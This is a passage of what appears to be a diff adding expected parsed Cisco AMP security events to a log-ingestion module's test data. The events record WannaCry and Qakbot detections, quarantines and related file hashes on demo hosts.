"ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 667000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 18745, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 4772, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229327140847656", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 28000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 20287, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056775", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 23391, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056774", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 24592, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056773", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 25793, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:09:00.000Z", + "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", + "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1493058569636000800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "event.start": "2021-01-14T14:09:00.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/Windows/SysWOW64/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 30752, + "process.hash.sha256": "b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:46:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6264772016730013699", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 611000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772016730014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 32509, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:45:59.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D5221F6847-100.SBX.TG", + "cisco.amp.detection_id": "6264772012435046402", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 940000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772012435046000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "Unconfirmed 762952.crdownload", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34974, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214500913741862", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 724000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 36260, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741859", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 38805, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 5580, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741858", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 210000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40328, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741855", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 194000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 41673, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741857", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43279, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741856", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 163000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44631, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214488028839966", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 447000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214492323807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 47096, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:29:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.event_type_id": 1107296257, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 535214029, + "event.action": "Potential Dropper Infection", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945890085425, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T13:29:36.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 49823, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:28:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 341000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412574627503014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 51019, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + 